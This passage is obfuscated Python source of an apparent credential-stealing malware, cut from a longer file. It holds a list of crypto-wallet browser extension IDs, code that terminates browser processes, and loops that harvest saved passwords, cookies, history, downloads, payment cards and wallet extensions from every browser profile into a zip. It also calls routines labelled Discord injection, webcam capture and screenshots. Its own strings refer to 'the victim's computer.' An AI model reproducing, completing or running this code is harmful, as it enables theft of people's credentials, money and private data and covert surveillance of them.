        ("Sui",             "opcgpfmipidbgpenhmajoajpbobppdil"),
        ("Martian",         "efbglgofoippbgcjepnhiblaibcnclgk"),
        ("Tron",            "ibnejdfjmmkpcnlpebklmnkoeoihofec"),
        ("Petra",           "ejjladinnckdgjemekebdpeokbikhfci"),
        ("Pontem",          "phkbamefinggmakgklpkljjmgibohnba"),
        ("Fewcha",          "ebfidpplhabeedpnhjnobghokpiioolj"),
        ("Math",            "afbcbjpbpfadlkmhmclhkeeodmamcflc"),
        ("Coin98",          "aeachknmefphepccionboohckonoeemg"),
        ("Authenticator",   "bhghoamapcdpbohphigoooaddinpkbai"),
        ("ExodusWeb3",      "aholpfdialjgjfhomihkjbmgjidlcdno"),
        ("Phantom",         "bfnaelmomeimhlpmgjnjophhpkkoljpa"),
        ("Core",            "agoakfejjabomempkjlepdflaleeobhb"),
        ("Tokenpocket",     "mfgccjchihfkkindfppnaooecgfneiii"),
        ("Safepal",         "lgmpcpglpngdoalbgeoldeajfclnhafa"),
        ("Solfare",         "bhhhlbepdkbapadjdnnojkbgioiodbic"),
        ("Kaikas",          "jblndlipeogpafnldhgmapagcccfchpi"),
        ("iWallet",         "kncchdigobghenbbaddojjnnaogfppfj"),
        ("Yoroi",           "ffnbelfdoeiohenkjibnmadjiehjhajb"),
        ("Guarda",          "hpglfhgfnhbgpjdenjgmdgoeiappafln"),
        ("Jaxx Liberty",    "cjelfplplebdjjenllpjcblmjkfcffne"),
        ("Wombat",          "amkmjjmmflddogmhpjloimipbofnfjih"),
        ("Oxygen",          "fhilaheimglignddkjgofkcbgekhenbh"),
        ("MEWCX",           "nlbmnnijcnlegkjjpcfjclmcfggfefdm"),
        ("Guild",           "nanjmdknhkinifnkgdcggcfnhdaammmj"),
        ("Saturn",          "nkddgncdjgjfcddamfgcmfnlhccnimig"),
        ("TerraStation",    "aiifbnbfobpmeekipheeijimdpnlpgpp"),
        ("HarmonyOutdated", "fnnegphlobjdpkhecapkijjdkgcjhkib"),
        ("Ever",            "cgeeodpfagjceefieflmdfphplkenlfk"),
        ("KardiaChain",     "pdadjkfkgcafgbceimcpbkalnfnepbnk"),
        ("PaliWallet",      "mgffkfbidihjpoaomajlbgchddlicgpn"),
        ("BoltX",           "aodkkagnadcbobfpggfnjeongemjbjca"),
        ("Liquality",       "kpfopkelmapcoipemfendmdcghnegimn"),
        ("XDEFI",           "hmeobnfnfcmdkdcmlblgagmfpfboieaf"),
        ("Nami",            "lpfcbjknijpeeillifnkikgncikgfhdo"),
        ("MaiarDEFI",       "dngmlblcodfobpdpecaadgfbcggfjfnm"),
        ("TempleTezos",     "ookjlbkiijinhpmnjffcofjonbfbgaoc"),
        ("XMR.PT",          "eigblbgjknlfbajkfhopmcojidlgcehm")
    ]
    
    try:
        for PPPUNSYRTZVWSHXMQPBKPQWICBLNGGACTHVLKNMATWXPRCSDKXOESUPDDFIVTEXAEYYFYQCQKOVDXYFJTIQUGUYIXDIDWYZKDNV, MLWJGPXJBJJXSIQFDDUNVXUVRQAHQKSRYIEKLUGQMLBNCCHDCRXYMHQJSFRYPFHOEAKXCYCLRCFLXKQ, v4r_proc_name in WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS_files:
            for v4r_proc in psutil.process_iter(['pid', 'name']):
                try:
                    if v4r_proc.name().lower() == v4r_proc_name.lower():
                        v4r_proc.terminate()
                except:
                    pass
    except:
        pass

    for PPPUNSYRTZVWSHXMQPBKPQWICBLNGGACTHVLKNMATWXPRCSDKXOESUPDDFIVTEXAEYYFYQCQKOVDXYFJTIQUGUYIXDIDWYZKDNV, MLWJGPXJBJJXSIQFDDUNVXUVRQAHQKSRYIEKLUGQMLBNCCHDCRXYMHQJSFRYPFHOEAKXCYCLRCFLXKQ, v4r_proc_name in WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS_files:
        if not os.path.exists(MLWJGPXJBJJXSIQFDDUNVXUVRQAHQKSRYIEKLUGQMLBNCCHDCRXYMHQJSFRYPFHOEAKXCYCLRCFLXKQ):
            continue

        BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS = LRBHWCEDMSDHVKQQPTVLRQXHYFLOQLWPGODAERSJSRZYHIZLFNNYHZVWQIMINUTQTOEKZLXLNXNOTTXYIGVZFTOQPKGKS(os.path.join(MLWJGPXJBJJXSIQFDDUNVXUVRQAHQKSRYIEKLUGQMLBNCCHDCRXYMHQJSFRYPFHOEAKXCYCLRCFLXKQ, 'Local State'))
        if not BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS:
            continue

        for v4r_profile in HXBQSVVYAZESVXWDYBDIGJQWKFAREFNZYTJGSKOERFUHUAWUTYRP:
            LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK = os.path.join(MLWJGPXJBJJXSIQFDDUNVXUVRQAHQKSRYIEKLUGQMLBNCCHDCRXYMHQJSFRYPFHOEAKXCYCLRCFLXKQ, v4r_profile)
            if not os.path.exists(LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK):
                continue

        for v4r_profile in HXBQSVVYAZESVXWDYBDIGJQWKFAREFNZYTJGSKOERFUHUAWUTYRP:
            LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK = os.path.join(MLWJGPXJBJJXSIQFDDUNVXUVRQAHQKSRYIEKLUGQMLBNCCHDCRXYMHQJSFRYPFHOEAKXCYCLRCFLXKQ, v4r_profile)
            if not os.path.exists(LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK):
                continue
            
            if "extentions" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
                try: WCQRSYMSVDQPUWEHCUBQEQKPZGXFNQRTXHSQZVGZQYICXUSASAHANEGBOCBAYYEUQIHHUCQG(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK, MUKWBZXRUWJJQWBIPMKCQEQPLVZWDVNQMGLJSNJCSHROGDMQJXTWTNNWB, PPPUNSYRTZVWSHXMQPBKPQWICBLNGGACTHVLKNMATWXPRCSDKXOESUPDDFIVTEXAEYYFYQCQKOVDXYFJTIQUGUYIXDIDWYZKDNV, LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK)
                except: pass
                
            if "passwords" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
                try: KNCGIGJIBPCVMMPMPHWATMLUUGLTKLLLXCHGPFVTPOEXTIJGDHGJRLSEUXDIXZSFBNPTMFRDQBIJXVHMZJQPZVYMPRHTLBUGHIG(PPPUNSYRTZVWSHXMQPBKPQWICBLNGGACTHVLKNMATWXPRCSDKXOESUPDDFIVTEXAEYYFYQCQKOVDXYFJTIQUGUYIXDIDWYZKDNV, LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK, BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS)
                except: pass
            if "cookies" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
                try: LBJUNIHHUYERLHUQMXFIIURFOMNTBZQACAFTFLNKKMZYKCCORGGWFJMATMWAYEYJOQUHVOGFPTUKXKVIEGTZBDBFAMJWZSYDAH(PPPUNSYRTZVWSHXMQPBKPQWICBLNGGACTHVLKNMATWXPRCSDKXOESUPDDFIVTEXAEYYFYQCQKOVDXYFJTIQUGUYIXDIDWYZKDNV, LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK, BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS)
                except: pass
            if "history" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
                try: GONCEYEAZVHWOHAFLHFREQUZKHMYKMWLXRWJXVWQPLZVHHMLKQOATYUIBBRLHX(PPPUNSYRTZVWSHXMQPBKPQWICBLNGGACTHVLKNMATWXPRCSDKXOESUPDDFIVTEXAEYYFYQCQKOVDXYFJTIQUGUYIXDIDWYZKDNV, LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK)
                except: pass
            if "downloads" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
                try: YPICNIQZOYIYCLNKZNBIJXVBDBGKJHQMLXLYYLYLNMMHYZSLIVCSMKLKIPTTZLZDBUGNBXAKTLHCBCZLCTEAVPMZCDCFRK(PPPUNSYRTZVWSHXMQPBKPQWICBLNGGACTHVLKNMATWXPRCSDKXOESUPDDFIVTEXAEYYFYQCQKOVDXYFJTIQUGUYIXDIDWYZKDNV, LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK)
                except: pass
            if "cards" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
                try: FMIKHJIDROGSUMVVLJHCHHTIFWJMXJJTUYSQDMZNMDEYVLKUIUTEOBKLGPFUPVPHKVLDATTPNQEPIXFMBETGVZDKSELCPKERL(PPPUNSYRTZVWSHXMQPBKPQWICBLNGGACTHVLKNMATWXPRCSDKXOESUPDDFIVTEXAEYYFYQCQKOVDXYFJTIQUGUYIXDIDWYZKDNV, LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK, BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS)
                except: pass

            if PPPUNSYRTZVWSHXMQPBKPQWICBLNGGACTHVLKNMATWXPRCSDKXOESUPDDFIVTEXAEYYFYQCQKOVDXYFJTIQUGUYIXDIDWYZKDNV not in AXVPJOOELLSBXHSHBADOFYLRFMZBPRDOTIHGWTDXVWXSOIEBTYLVWKBGJLUJBHRVVMZLVZNIDQWCQIVHKTPYUTWASZ:
                AXVPJOOELLSBXHSHBADOFYLRFMZBPRDOTIHGWTDXVWXSOIEBTYLVWKBGJLUJBHRVVMZLVZNIDQWCQIVHKTPYUTWASZ.append(PPPUNSYRTZVWSHXMQPBKPQWICBLNGGACTHVLKNMATWXPRCSDKXOESUPDDFIVTEXAEYYFYQCQKOVDXYFJTIQUGUYIXDIDWYZKDNV)

    if "passwords" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
        if not VVDVSCUZAUXSHKFOEAYCCWGOZXYMGFSHACVBRGNPWQTMJDOQRWHOQUWWOAZZDAATIZKLLYDHSBYTEICNSTNQFMDDI:
            VVDVSCUZAUXSHKFOEAYCCWGOZXYMGFSHACVBRGNPWQTMJDOQRWHOQUWWOAZZDAATIZKLLYDHSBYTEICNSTNQFMDDI.append("No passwords was saved on the victim's computer.")
        VVDVSCUZAUXSHKFOEAYCCWGOZXYMGFSHACVBRGNPWQTMJDOQRWHOQUWWOAZZDAATIZKLLYDHSBYTEICNSTNQFMDDI = "\n".join(VVDVSCUZAUXSHKFOEAYCCWGOZXYMGFSHACVBRGNPWQTMJDOQRWHOQUWWOAZZDAATIZKLLYDHSBYTEICNSTNQFMDDI)
    if "cookies" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
        if not TNAOWXOYWYAWXDOWCMIBXZTQHVFTSVSKGYNKORVACRQILYEFXWBVBOGIIQAUPSOPDGVFFEKEJNPFSJDMBTW:
            TNAOWXOYWYAWXDOWCMIBXZTQHVFTSVSKGYNKORVACRQILYEFXWBVBOGIIQAUPSOPDGVFFEKEJNPFSJDMBTW.append("No cookies was saved on the victim's computer.")
        TNAOWXOYWYAWXDOWCMIBXZTQHVFTSVSKGYNKORVACRQILYEFXWBVBOGIIQAUPSOPDGVFFEKEJNPFSJDMBTW   = "\n".join(TNAOWXOYWYAWXDOWCMIBXZTQHVFTSVSKGYNKORVACRQILYEFXWBVBOGIIQAUPSOPDGVFFEKEJNPFSJDMBTW)
    if "history" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
        if not QDSUNTGMSJUFCUPQELVYNXGTBTBKLUKWEVECCAOZQKEGGUTYOVXAVMQSVSDMEFIBWAZKAVALVYAVWWAHNZHFUYUMRDQJY:
            QDSUNTGMSJUFCUPQELVYNXGTBTBKLUKWEVECCAOZQKEGGUTYOVXAVMQSVSDMEFIBWAZKAVALVYAVWWAHNZHFUYUMRDQJY.append("No history was saved on the victim's computer.")
        QDSUNTGMSJUFCUPQELVYNXGTBTBKLUKWEVECCAOZQKEGGUTYOVXAVMQSVSDMEFIBWAZKAVALVYAVWWAHNZHFUYUMRDQJY   = "\n".join(QDSUNTGMSJUFCUPQELVYNXGTBTBKLUKWEVECCAOZQKEGGUTYOVXAVMQSVSDMEFIBWAZKAVALVYAVWWAHNZHFUYUMRDQJY)
    if "downloads" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
        if not CZEQDCTJKCOFEGAMNTQFCELVKWTJZJULAECGXXIKOAUKOPJBXGEQEDTWIVXHUMRLPURTLPRWLEZWLBNPL:
            CZEQDCTJKCOFEGAMNTQFCELVKWTJZJULAECGXXIKOAUKOPJBXGEQEDTWIVXHUMRLPURTLPRWLEZWLBNPL.append("No downloads was saved on the victim's computer.")
        CZEQDCTJKCOFEGAMNTQFCELVKWTJZJULAECGXXIKOAUKOPJBXGEQEDTWIVXHUMRLPURTLPRWLEZWLBNPL = "\n".join(CZEQDCTJKCOFEGAMNTQFCELVKWTJZJULAECGXXIKOAUKOPJBXGEQEDTWIVXHUMRLPURTLPRWLEZWLBNPL)
    if "cards" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
        if not PEDGQYITHYUFZNGMWCUMSAWKQKAGMSSUHAUUWHNEVCSURMDVYLVA:
            PEDGQYITHYUFZNGMWCUMSAWKQKAGMSSUHAUUWHNEVCSURMDVYLVA.append("No cards was saved on the victim's computer.")
        PEDGQYITHYUFZNGMWCUMSAWKQKAGMSSUHAUUWHNEVCSURMDVYLVA     = "\n".join(PEDGQYITHYUFZNGMWCUMSAWKQKAGMSSUHAUUWHNEVCSURMDVYLVA)
    
    if KAQPNBIKWBDBUSAZDKJHICRDYMPBFPMOJKCGXLKQTMUTGKEJBCQUOVAMHGDEFWSDFWHVVRDEMV != None:
        ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK.writestr(f"Passwords ({KAQPNBIKWBDBUSAZDKJHICRDYMPBFPMOJKCGXLKQTMUTGKEJBCQUOVAMHGDEFWSDFWHVVRDEMV}).txt", VVDVSCUZAUXSHKFOEAYCCWGOZXYMGFSHACVBRGNPWQTMJDOQRWHOQUWWOAZZDAATIZKLLYDHSBYTEICNSTNQFMDDI)

    if LOXNIATXFGKVVPIGVYMNVPRQXBSRQOVUGYUQXQPGHOJQBQVICPXPSRWPRRVVVTOWUSQPIUQNLFPWBPZFJZLKTRVHEWIXZNGESQ != None:
        ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK.writestr(f"Cookies ({LOXNIATXFGKVVPIGVYMNVPRQXBSRQOVUGYUQXQPGHOJQBQVICPXPSRWPRRVVVTOWUSQPIUQNLFPWBPZFJZLKTRVHEWIXZNGESQ}).txt", TNAOWXOYWYAWXDOWCMIBXZTQHVFTSVSKGYNKORVACRQILYEFXWBVBOGIIQAUPSOPDGVFFEKEJNPFSJDMBTW)

    if UVRHHSACUEEKHJTWBAPEMLWSOOOLFKTLNBPXCWZEZVLEIUQULXORVRNWABELDPIEJY != None:
        ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK.writestr(f"Cards ({UVRHHSACUEEKHJTWBAPEMLWSOOOLFKTLNBPXCWZEZVLEIUQULXORVRNWABELDPIEJY}).txt", PEDGQYITHYUFZNGMWCUMSAWKQKAGMSSUHAUUWHNEVCSURMDVYLVA)

    if EDHKUCJWZSHFYVTMOEKQRLPJWMZJVWVOJJMQYXCYLCRXCGNFOBIFVSPVHZRCJJJSXYHSGDPQSKHMJYGOROWTUPWPWMMEHVCDZTO != None:
        ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK.writestr(f"Browsing History ({EDHKUCJWZSHFYVTMOEKQRLPJWMZJVWVOJJMQYXCYLCRXCGNFOBIFVSPVHZRCJJJSXYHSGDPQSKHMJYGOROWTUPWPWMMEHVCDZTO}).txt", QDSUNTGMSJUFCUPQELVYNXGTBTBKLUKWEVECCAOZQKEGGUTYOVXAVMQSVSDMEFIBWAZKAVALVYAVWWAHNZHFUYUMRDQJY)

    if ZOUAHFWPNYVIFMFRCJTFXEEIDNIYPISMUJXJKSQIOWREYKUNFSEHJSMCFNTMQTYXKLWWZYIQEALQIHLWNMZYTROYSFANWKUHU != None:
        ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK.writestr(f"Download History ({ZOUAHFWPNYVIFMFRCJTFXEEIDNIYPISMUJXJKSQIOWREYKUNFSEHJSMCFNTMQTYXKLWWZYIQEALQIHLWNMZYTROYSFANWKUHU}).txt",CZEQDCTJKCOFEGAMNTQFCELVKWTJZJULAECGXXIKOAUKOPJBXGEQEDTWIVXHUMRLPURTLPRWLEZWLBNPL)

    return SZDNITIHXGYVWRSLDZEAWADAKSFGQSCOTISOFHRHHXPEJALPKRFMQFRCAKLMHTQXGHTXWDGFFDCEFHEOVWFIRYOAPYXBLFCFDOQQ, KAQPNBIKWBDBUSAZDKJHICRDYMPBFPMOJKCGXLKQTMUTGKEJBCQUOVAMHGDEFWSDFWHVVRDEMV, LOXNIATXFGKVVPIGVYMNVPRQXBSRQOVUGYUQXQPGHOJQBQVICPXPSRWPRRVVVTOWUSQPIUQNLFPWBPZFJZLKTRVHEWIXZNGESQ, EDHKUCJWZSHFYVTMOEKQRLPJWMZJVWVOJJMQYXCYLCRXCGNFOBIFVSPVHZRCJJJSXYHSGDPQSKHMJYGOROWTUPWPWMMEHVCDZTO, ZOUAHFWPNYVIFMFRCJTFXEEIDNIYPISMUJXJKSQIOWREYKUNFSEHJSMCFNTMQTYXKLWWZYIQEALQIHLWNMZYTROYSFANWKUHU, UVRHHSACUEEKHJTWBAPEMLWSOOOLFKTLNBPXCWZEZVLEIUQULXORVRNWABELDPIEJY

LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN = []

IOAWKHWDHOANLTFPPJRNULBIETSKRAPNJJUFMKUYFEUFATOUGIOPGYVMXUAYNAQRWOVTGDSDRXVLPZIKIWQPEZNTEWELXUX = io.BytesIO()
with zipfile.ZipFile(IOAWKHWDHOANLTFPPJRNULBIETSKRAPNJJUFMKUYFEUFATOUGIOPGYVMXUAYNAQRWOVTGDSDRXVLPZIKIWQPEZNTEWELXUX, "w", zipfile.ZIP_DEFLATED) as ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK:

    try: 
        XOHKZWKTMLCYLXLNDSNKJQPMYFWOBEPRFKBEFLDBHMJAPYLOGYDJLEMKJXWBLO = QCVUOSRRAIILSXJYLXZLYIJQWHERVNRDRCIBYBHAYVBXLDPWZTUXAUNPUARLGMRQBWJTEBWKSEVGXDRBMTIBETQFEKBOCZIKAUOO()
    except Exception as e:
        XOHKZWKTMLCYLXLNDSNKJQPMYFWOBEPRFKBEFLDBHMJAPYLOGYDJLEMKJXWBLO = f"Error: {e}"

    try: 
        TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_system_info = QFYEQKEKUJFUFNRPRFWESFZFLDPLVNIPNIRDXDKLUFPYWMMNAZVYPMSMSSSVGESDQSUKUQWRVCVUGZD(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK)
    except Exception as e:
        TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_system_info = f"Error: {e}"

    try: 
        LBYKQAYBIVTBMQRWQXNKMEPBOMMNVYTDYVRMCADJMAOHZULCUWTYOOFTBKPQKMS = WQEJIKOKEPQWSFBWCIYRERVXMGRBCRNSRIQKYQVLEXJDESIZLYXRWXUIBKBESGSIETFWKEVWZMEGCSYBPIYADCBQXIELDKIVXZN(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK)
    except Exception as e:
        LBYKQAYBIVTBMQRWQXNKMEPBOMMNVYTDYVRMCADJMAOHZULCUWTYOOFTBKPQKMS = f"Error: {e}"

    try: 
        SZDNITIHXGYVWRSLDZEAWADAKSFGQSCOTISOFHRHHXPEJALPKRFMQFRCAKLMHTQXGHTXWDGFFDCEFHEOVWFIRYOAPYXBLFCFDOQQ, KAQPNBIKWBDBUSAZDKJHICRDYMPBFPMOJKCGXLKQTMUTGKEJBCQUOVAMHGDEFWSDFWHVVRDEMV, LOXNIATXFGKVVPIGVYMNVPRQXBSRQOVUGYUQXQPGHOJQBQVICPXPSRWPRRVVVTOWUSQPIUQNLFPWBPZFJZLKTRVHEWIXZNGESQ, EDHKUCJWZSHFYVTMOEKQRLPJWMZJVWVOJJMQYXCYLCRXCGNFOBIFVSPVHZRCJJJSXYHSGDPQSKHMJYGOROWTUPWPWMMEHVCDZTO, ZOUAHFWPNYVIFMFRCJTFXEEIDNIYPISMUJXJKSQIOWREYKUNFSEHJSMCFNTMQTYXKLWWZYIQEALQIHLWNMZYTROYSFANWKUHU, UVRHHSACUEEKHJTWBAPEMLWSOOOLFKTLNBPXCWZEZVLEIUQULXORVRNWABELDPIEJY = BGPQOVPXHZJSXYIATWRLRVSEDATUWZKDXOOLRSCINIEGZTCVKAYUQS(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK)
    except Exception as e:
        SZDNITIHXGYVWRSLDZEAWADAKSFGQSCOTISOFHRHHXPEJALPKRFMQFRCAKLMHTQXGHTXWDGFFDCEFHEOVWFIRYOAPYXBLFCFDOQQ = f"Error: {e}"
        KAQPNBIKWBDBUSAZDKJHICRDYMPBFPMOJKCGXLKQTMUTGKEJBCQUOVAMHGDEFWSDFWHVVRDEMV = f"Error: {e}"
        LOXNIATXFGKVVPIGVYMNVPRQXBSRQOVUGYUQXQPGHOJQBQVICPXPSRWPRRVVVTOWUSQPIUQNLFPWBPZFJZLKTRVHEWIXZNGESQ = f"Error: {e}"
        EDHKUCJWZSHFYVTMOEKQRLPJWMZJVWVOJJMQYXCYLCRXCGNFOBIFVSPVHZRCJJJSXYHSGDPQSKHMJYGOROWTUPWPWMMEHVCDZTO = f"Error: {e}"
        ZOUAHFWPNYVIFMFRCJTFXEEIDNIYPISMUJXJKSQIOWREYKUNFSEHJSMCFNTMQTYXKLWWZYIQEALQIHLWNMZYTROYSFANWKUHU = f"Error: {e}"
        UVRHHSACUEEKHJTWBAPEMLWSOOOLFKTLNBPXCWZEZVLEIUQULXORVRNWABELDPIEJY = f"Error: {e}"

    try: 
        FCMLUIRECDYZJGYXXKNOFZQUQOHSSMZAPDGMZSOAQYOQTKHEGVIUAXVGSTDNRSSVN = CPUKIXZDIOXMYXAMNWJKSLWZUIZWKRAYGXHDTLMPAOQKQUVEKUVUKMIXMRCLFYIAVJCHCMWUKRISNBPKFQIIZKQXNQ(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK)
    except Exception as e:
        FCMLUIRECDYZJGYXXKNOFZQUQOHSSMZAPDGMZSOAQYOQTKHEGVIUAXVGSTDNRSSVN = f"Error: {e}"

    try: 
        TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_camera_capture = HGLKOAQITQVVOJGDFNNERGAHATXSHAYFGJVVOAFBWZJRCAWYILZCAGXCCTRTQINFEAQBJNUN(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK)
    except Exception as e:
        TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_camera_capture = f"Error: {e}"

    try: 
        TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_screenshot = HDZYYXHRCMWQDCOUEELJRCDBZMFRURLSDPFSIRPHMOEOOWFESHWPTRDIWTGTUGHSZJOGK(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK)
    except Exception as e:
        TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_screenshot = f"Error: {e}"

    try: 
        YKTYRXAWIHYOWTTJZJUCNEJKZZJGZONBBHZRINVSLNMYQNHTZHCDPVVEGMSNOGHTAPUAGFHRNLBYKBCWOVBPL, YHWJNEHXQWERJIJNULRAHBMRHZZESNGVGRYADBHWVXTQLXPORKZSSZIXRBNGFBHSRXAFJDFZVHMVDJACOUGDSWPMKHIJHHJMQXY, HWZMJYVZXGFOTOPTMEXEEJMNNLKWLIIFWMKUXHZQKJVIYLZBZPAEUOUWUSIEKLTRWODOFVPZSXXKBQGJKNBEUXXPYBRFJSYIAPKY = WQRTRSCSCDEPGFBCSBNMBRVRISXHKORLNXPOYUKHEZBJOSBIQUUCRJORCIGMANZYPMAICEEYLYPGKF(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK)
    except Exception as e:
        TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_screenshot = f"Error: {e}"

    try: 
        AIYDCXMOXCGSQPTWFGXVADVLLFPOQUGKSYQTPLJHPSYFMHCCWIPW = FFTPBZWTUYDPALMCJUIBZGKZGGIZMRMWLXYDPTOJFEBITVSASROAZACMRDJEOYPBJRGNOGVUB(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK)
    except Exception as e:
        AIYDCXMOXCGSQPTWFGXVADVLLFPOQUGKSYQTPLJHPSYFMHCCWIPW = f"Error: {e}"

    if XOHKZWKTMLCYLXLNDSNKJQPMYFWOBEPRFKBEFLDBHMJAPYLOGYDJLEMKJXWBLO != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Discord Injection : {XOHKZWKTMLCYLXLNDSNKJQPMYFWOBEPRFKBEFLDBHMJAPYLOGYDJLEMKJXWBLO}")

    if TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_camera_capture != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Camera Capture    : {TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_camera_capture}")

    if TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_screenshot != None:
